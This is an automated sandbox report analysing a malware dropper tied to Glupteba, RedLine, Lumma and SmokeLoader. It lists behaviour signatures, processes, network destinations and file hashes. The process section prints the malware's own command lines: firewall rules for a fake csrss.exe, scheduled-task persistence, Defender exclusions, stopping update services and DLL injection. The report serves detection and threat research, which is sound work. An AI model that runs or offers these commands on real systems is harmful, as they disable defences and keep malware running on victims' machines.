Malware Analysis Report

2025-03-15 05:09

Sample ID 231211-la1ysacbc9
Target 0x00070000000146ff-113.dat
SHA256 fd3b5cae25f6e183b1d917bd9074662c7526ead9c307279d25cd979cd8805cb0
Tags
glupteba lumma redline smokeloader @oleh_ps livetraffic up3 backdoor dropper evasion infostealer loader stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fd3b5cae25f6e183b1d917bd9074662c7526ead9c307279d25cd979cd8805cb0

Threat Level: Known bad

The file 0x00070000000146ff-113.dat was found to be: Known bad.

Malicious Activity Summary

glupteba lumma redline smokeloader @oleh_ps livetraffic up3 backdoor dropper evasion infostealer loader stealer themida trojan upx

Smokeloader family

Glupteba payload

RedLine payload

Lumma Stealer

Glupteba

RedLine

SmokeLoader

Detect Lumma Stealer payload V4

Modifies Windows Firewall

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Themida packer

Deletes itself

UPX packed file

Launches sc.exe

Program crash

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Runs net.exe

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-11 09:20

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-11 09:20

Reported

2023-12-11 09:23

Platform

win10v2004-20231130-en

Max time kernel

137s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe"

Signatures

Detect Lumma Stealer payload V4

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9933.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\502F.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3260 wrote to memory of 3700 N/A N/A C:\Users\Admin\AppData\Local\Temp\9933.exe
PID 3260 wrote to memory of 3700 N/A N/A C:\Users\Admin\AppData\Local\Temp\9933.exe
PID 3260 wrote to memory of 3700 N/A N/A C:\Users\Admin\AppData\Local\Temp\9933.exe
PID 3260 wrote to memory of 3396 N/A N/A C:\Users\Admin\AppData\Local\Temp\502F.exe
PID 3260 wrote to memory of 3396 N/A N/A C:\Users\Admin\AppData\Local\Temp\502F.exe
PID 3260 wrote to memory of 3396 N/A N/A C:\Users\Admin\AppData\Local\Temp\502F.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe

"C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe"

C:\Users\Admin\AppData\Local\Temp\9933.exe

C:\Users\Admin\AppData\Local\Temp\9933.exe

C:\Users\Admin\AppData\Local\Temp\502F.exe

C:\Users\Admin\AppData\Local\Temp\502F.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\is-E9VN6.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-E9VN6.tmp\tuc3.tmp" /SL5="$80034,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\5968.exe

C:\Users\Admin\AppData\Local\Temp\5968.exe

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 1

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -s

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 116 -ip 116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 116 -s 328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F192.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FFEB.bat" "

C:\Users\Admin\AppData\Local\Temp\E63.exe

C:\Users\Admin\AppData\Local\Temp\E63.exe

C:\Users\Admin\AppData\Local\Temp\1D29.exe

C:\Users\Admin\AppData\Local\Temp\1D29.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3164 -ip 3164

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Users\Admin\AppData\Local\Temp\5707.exe

C:\Users\Admin\AppData\Local\Temp\5707.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 3.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
RU 81.19.131.34:80 81.19.131.34 tcp
US 8.8.8.8:53 34.131.19.81.in-addr.arpa udp
RU 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
MD 176.123.7.190:32927 tcp
US 8.8.8.8:53 190.7.123.176.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 127.27.251.142.in-addr.arpa udp
US 8.8.8.8:53 24.52.193.212.in-addr.arpa udp
RU 212.193.52.24:80 tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.2:443 walkinglate.com tcp
BG 185.82.216.111:443 tcp
US 8.8.8.8:53 udp
BG 185.82.216.111:443 tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 tcp
US 8.8.8.8:53 udp
US 104.21.42.224:443 edarululoom.com tcp
RU 77.105.132.87:6731 tcp
RU 212.193.52.24:80 tcp
RU 212.193.52.24:80 tcp
RU 212.193.52.24:80 host-host-file8.com tcp
US 8.8.8.8:53 brusuax.com udp
AR 190.224.203.37:80 brusuax.com tcp
US 172.67.143.130:80 tcp
US 8.8.8.8:53 diagramfiremonkeyowwa.fun udp
US 8.8.8.8:53 75.181.67.172.in-addr.arpa udp
US 172.67.183.217:80 diagramfiremonkeyowwa.fun tcp
US 8.8.8.8:53 ratefacilityframw.fun udp
US 188.114.96.2:80 ratefacilityframw.fun tcp
US 8.8.8.8:53 reviveincapablewew.pw udp
US 8.8.8.8:53 181.174.67.172.in-addr.arpa udp
US 8.8.8.8:53 130.143.67.172.in-addr.arpa udp
US 38.47.221.193:34368 tcp
US 8.8.8.8:53 217.183.67.172.in-addr.arpa udp
US 8.8.8.8:53 cakecoldsplurgrewe.pw udp
US 8.8.8.8:53 opposesicknessopw.pw udp
US 8.8.8.8:53 politefrightenpowoa.pw udp
US 172.67.181.75:80 tcp
US 172.67.174.181:80 tcp
US 8.8.8.8:53 193.221.47.38.in-addr.arpa udp
US 162.159.135.233:443 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 51.15.193.130:14433 xmr-eu1.nanopool.org tcp

Files

memory/4964-0-0x0000000000400000-0x000000000040B000-memory.dmp

memory/3260-1-0x0000000002ED0000-0x0000000002EE6000-memory.dmp

memory/4964-3-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9933.exe

MD5 f88edad62a7789c2c5d8047133da5fa7
SHA1 41b1f056cdda764a1c7c402c6fa4f8ab2f3ce5f9
SHA256 eb2b1ce5574096b91eb9e0482117d2518ab188c0747a209dc77e88d30bb970dc
SHA512 e2d5b0ace5dfd3bd2321b2a42b7e7725071ca440389dc5ef12720a34727ae84c2907cd7befeae5d53568d9deaee8443f4cbda44b598cfc9b6316d9389be09a60

C:\Users\Admin\AppData\Local\Temp\502F.exe

MD5 6988376473ea888909b4abbd324414c4
SHA1 9a3e5d782c5317c5ac5d1320e1d84b3b0944dd61
SHA256 1e0baeb32d1a7293c6ee10d957a053657cf02e6085ff256e422ab64bdf276e5f
SHA512 83a77fc0e607f7e8a92b64b37907bcf025c833db7e7ac8b49ec7cd292b9a36faf6135cf2e66fdb72d946ea5ad5d4b94f5848d616639cf752bf4a647a43a9f8ba

C:\Users\Admin\AppData\Local\Temp\502F.exe

MD5 82db150dc7c62b579396b17b5a2ec9b0
SHA1 7bdf2d4b50327042c0e3759bbfb81ce3ce77d582
SHA256 1583ab280b27fa61b31a774af4eab2d99218b1a52ebf171af41c74d6f8ae4a7d
SHA512 0bfbf201aac4e5ae03c69c2bab6424295be0906014cfd175b0fcb1625b4662ed6e81ee4c0288607e99640a84e4918a8f2cc9b0d19fee570b264d7d38e2024951

memory/3396-16-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/3396-17-0x0000000000E70000-0x0000000002326000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 4d23ef69120b8bb88916ab31493a3af5
SHA1 d2d604148959a45f60b81b07492c87a717986475
SHA256 06488ff17cddebfb4f56d9a0e98444e0a68a16ad10334806a79bdf4b6151967b
SHA512 704d9a9c43bc3b2d2662171bc084287b9c20b4d436097b215170f1e96ea9adc9df3001db9106a3f41fbee68f55ca4a8cc1f664afe9a7ee0be626afb66b52c909

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 a8a4513456393fdcd97eefd40c49271b
SHA1 eaee3b74af9553c3eb96fd4a1901fcaf5e571c0d
SHA256 89221deb947df9dc7bd1e84335058d7251df65de8d2a56cc44fd89842e94d50e
SHA512 7dc74bc192f0ef52db4ec540cf12fdd4b9f398680707d9053a9cc7be04fc6f96f790966bc552b5b941bf7bbce3c7d9152580e6a11d254b4c454ad873ac26a951

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 cde750f39f58f1ec80ef41ce2f4f1db9
SHA1 942ea40349b0e5af7583fd34f4d913398a9c3b96
SHA256 0a434be25f55f27ce0adbdfb08efeac1da01125b3e9194a94669bc7e9c6fe094
SHA512 c181faacbef70f8a91606943470af50cfd443958c48601051371ff5d9bf66bb9ec794571b05a347a7f5776f06484dc007f535591d2f5e1c57e3c0ee04f3e9580

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 ef03e3559ed103ae89ea34cbd14780a0
SHA1 37873b16197c28f8670e3f26f31280c06b1ec00c
SHA256 bca23968168d8c205ac2cc65d6f84072eede10e451c51f9afd79f75fcadd4f97
SHA512 9d27f8e855d0c9edae25c42190e9b0e287cee04e5eaa222faab3e4bc07b3ccd92ae18e9911536a1372037db95a6f9ea457e1a7264454a0a76a2a651072fd6670

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 398bb75bc6435923f6f01c2a59831802
SHA1 61dcc57683bed6d4fc973b9b94b6eadfe25b818f
SHA256 4e715fd8f1342affa85372d3238c2fd554905debbd0173beab49408cbeb44c10
SHA512 3879c24ef4a949c00f8155675e550f8fba20cb1e5397cf6887f98ce3a44d49b5af5de30f620c18a87b22c8a40f2d57674d05167c85550c53400c64b4fe5db492

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 06e7b7f2fc021294acb20ebe6825297b
SHA1 cee06fa6fc1d91c6d64a669326dcac0e284f3c63
SHA256 13ab1f7fb7272eda3988614e0bfd3a4e157ecb5f9f29026f949063c8668b0dcf
SHA512 40efbf825cc54a65d6ed595e4754c35c5d915ea2f0fdc27a8c664cb6a4e37acc5e1070908f0fb7ce8d6c5bdaca44bbaa1bd033580ef769b29fc04860577c8edd

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 280675bd0abfffc9e229b0b6bb8347b1
SHA1 f33099885de4289c6cfec1643370e1511aa8f66c
SHA256 ff08af74e4556312408be4af25836da018d7c6914ba95059f9ed6f31c02a45a9
SHA512 d64378df930e721e1ccda950f84624de61178d2c656d03ec7f102af737e84043971c533894fa5e824b6059ec427f2f8f46bc35c1d2f6b8992a1d1fbc6dcd06d7

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 dab3ba66e88da4f3054cadb9243f29dd
SHA1 52b86e953c068418c9312526b173c54fe4e8b3f7
SHA256 b9a8fd03026f8fae09191268f085d130f43bbb37603b1bd4e57497037d2301cd
SHA512 cdd2e956716364d4ef2ca77b90229582bf4d00cd42f116ab803aeec6d31e9b6b14162fe8e8498a720ff6aa6ecf8fd2994d70014ad9ebb6d33ed1b17bcf516aca

memory/2312-60-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4712-62-0x0000000000B30000-0x0000000000B31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 5de4024c9568344eaf8b51106af43d4f
SHA1 d553b109e435a292fecc5910ed2a410eb8e04ca4
SHA256 a0d0b3b0001d3b287a695a78f078639651d88de3cd2f7dd95cd928178ecf00a8
SHA512 bcc32b311ac201f0f46098ec7bcb657b634a60a3f104fb462dbb0718294ddebd05af76ea233dcfb4a9cfefab434e673264d7608ae2337212f4f555be4a9d4bb0

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 0aaf09d0a08b397e13d2029eab0e3878
SHA1 bb96a1d3c6b146a4bf890b1c876df1e4d93a9558
SHA256 c4c5b2e42c190b51f35ecd990c2dec93ae8042d8699a43c1394ba8b70226c87a
SHA512 a8811e2c4d2c0c0cb324845339d3decd281db55f2450d393dbe01f9758dd5395b6276cb0997e29f651b320565b7691b80a2828a8a295cd7ff2576d3a6dd84df4

C:\Users\Admin\AppData\Local\Temp\is-E9VN6.tmp\tuc3.tmp

MD5 a0408bfb1eade46f6d40555bbc03e52d
SHA1 8081ab527becd3c62bfda07d1f651861d784f8dd
SHA256 2a52fe729797fd778011694da8ec2628b3a48a930d88cdba2e3ddf32b07e24d6
SHA512 7658be153229f0039f3c40d9d2891ce0707756099a42ccc52ba130e28a8e73fedf28ea1aeafec8d4fe9f3bb2d649cb463e87bfc3b9bf4b06d68c74c592d60d53

memory/3396-76-0x0000000074B60000-0x0000000075310000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-G7GVP.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Temp\is-G7GVP.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 1ff21aaa9f0defece1347d7a2f2e7e90
SHA1 c860f1c1623926f76d3e04f54a51a081ae28765d
SHA256 09c29bc4b55493f9dd7aaf464becf8c7b913d134da996dfb8a2804c36b0221ef
SHA512 57f429d8d4ee094238241427fc58c2572af963c003ce54eae7b1ac42abe64ab5e1377f1fc0de83f1b0bc706ee7e2787b06c1880ef4da4f92f800f814674dbd9d

C:\Users\Admin\AppData\Local\Temp\5968.exe

MD5 91d23595c11c7ee4424b6267aabf3600
SHA1 ef161bb8e90cebdf81f4e53dfccb50c1f90a9a02
SHA256 d58937d468f6ca92b12ee903a16a4908de340f64f894cf7f1c594cd15c0c7e47
